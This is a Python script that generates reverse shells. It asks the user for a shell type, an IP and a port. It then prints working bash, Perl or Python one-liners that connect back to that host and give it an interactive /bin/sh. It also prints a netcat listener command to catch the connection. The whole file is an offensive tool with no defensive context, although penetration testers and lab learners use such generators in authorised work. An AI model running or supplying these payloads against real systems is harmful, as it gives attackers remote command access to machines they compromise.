#! /usr/bin/env python

# Created by d0nkeyk0ng787/gnome787

# Simple reverse shell generator
# This is a stripped down more functional version

def gen_shell(shell, ip, port):
	
	if shell.lower() == 'bash':
		print("bash -i >& /dev/tcp/{}/{} 0>&1".format(ip, port))
	elif shell.lower() == 'perl':
		print("perl -e 'use Socket;$i=\"{}\";$p={};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");}};'".format(ip, port))
	elif shell.lower() == 'python':
		print("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{}\",{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'".format(ip, port))

def nc_listener(port):
	print("nc -lnvp " + port)


def shell_list():

	print("Here is a list of reverse shells this script can generate!")
	print("Commands: quit, help")
	print("Bash")
	print("PERL")
	print("Python")
	

def main():

	usage = True
	shells = ["bash", "perl", "python"]

	print("Enter help for a list of shells & commands")
	
	while usage:

		selection = input("Which reverse shell would you like to generate: ")
		print(selection)

		if selection.lower() == "help":
			shell_list()
		else:
			if selection.lower() in shells:
				ip = input("IP ")
				port = input("PORT: ")
				gen_shell(selection, ip, port)
				nc_listener(port)
				break
			elif selection.lower() == 'quit':
				print("Quitting")
				usage = False
				break
			else:
				print("Please make a valid selection")
				break

if __name__ == '__main__':

	main()
